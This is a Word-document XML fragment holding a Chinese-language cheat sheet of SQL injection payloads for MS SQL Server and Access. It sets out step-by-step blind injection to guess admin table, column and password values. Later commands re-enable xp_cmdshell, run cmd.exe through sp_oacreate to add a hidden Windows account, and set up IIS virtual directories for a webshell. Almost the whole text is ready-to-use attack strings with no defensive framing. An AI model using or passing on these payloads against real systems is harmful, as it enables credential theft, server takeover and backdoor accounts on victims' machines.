      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>delete from table_name where Stockid = 3 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注射语句的经典总结</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>注射语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断有无注入点</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>' ; and 1=1 and 1=2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜表一般的表的名称无非是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">admin adminuser user pass password </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>.. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from *) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from admin) ---</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断是否存在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这张表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数目</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如果遇到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">0&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回正确页面</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> 1&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回错误页面说明</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>数目就是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;(select count(*) from admin) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1&lt;(select count(*) from admin) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>4.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解字段</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">len( ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>括号里面加上我们想到的字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(*)&gt;0)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>name)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>密码字段名称</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>password)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>5.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解各个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段的长度</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解长度</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>就是把</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>变换</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>直到返回正确页面为止</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where len(*)&gt;0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)&gt;6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)&gt;5) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(name)=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)&gt;11) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)&gt;12) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>长度是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>12 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select count(*) from admin where len(password)=12) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>正确</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>6.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解字符</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where left(name,1)='a') ---</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解用户帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的第一位</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select count(*) from admin where left(name,2)='ab')---</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜解用户帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的第二位</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>就这样一次加一个字符这样猜</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>猜到够你刚才猜出来的多少位了就对了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>就算出来了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) -- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这个查询语句</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>可以猜解中文</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>的用户和密码</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>只要把后面的数字换成中文的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>ASSIC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>码就</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>OK.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>最后把结果再转换成字符</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>. </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看服务器打的补丁</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>出错了打了</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SP4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>补丁</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">and 1=(select </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>｛ＡＴ｝</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>@VERSION)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看数据库连接账号的权限，返回正常，证明是服务器角色</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sysadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select IS_SRVROLEMEMBER('sysadmin'))-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>判断连接数据库</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>。（采用</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>账号连接</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回正常</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>证明了连接账号是</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 'sa'=(Select System_user)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and user_name()='dbo'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>and 0&lt;&gt;(select user_name()-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>看</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>是否删除</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name = 'xp_cmdshell')-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>被删除，恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>支持绝对路径的恢复</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;EXEC master.dbo.sp_addextendedproc </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>反向</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PING</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>自己实验</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>加</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>jiaoniang$ 1866574 /add'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>创建一个虚拟目录</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>盘：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'run', NULL,' cscript.exe c</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\inetpub\wwwroot\mkwebdir.vbs -w "</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>站点</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>" </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-v "e","e</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\"'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>访问属性：（配合写入一个</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'run', NULL,' cscript.exe c</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>\inetpub\wwwroot\chaccess.vbs -a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>w3svc/1/ROOT/e +browse' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>爆库</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>特殊技巧：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">:%5c='\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>或者把</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">\ </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>%5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>如何得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>SQLSERVER</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>某个数据库中所有表的表名？</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-------------------------------------------------------------------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>用户表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'U'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>系统表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'S'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>所有表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select name from sysobjects where xtype = 'S' or xtype = 'U'; </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-------------------------------------------------------------------------------- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from newtable)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到库名（从</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>都是系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>以上才可以判断）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(select name from master.dbo.sysdatabases where dbid=7)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from master.dbo.sysdatabases where name&gt;1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>dbid=6) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>依次提交</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> dbid = 7,8,9.... </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到更多的数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>&gt;(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve">select top 1 name from bbs.dbo.sysobjects where xtype='U') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>暴到一个表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>假设为</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">not in ('Admin')) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>来得到其他的表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select count(*) from bbs.dbo.sysobjects where xtype='U' and </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>name='admin' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
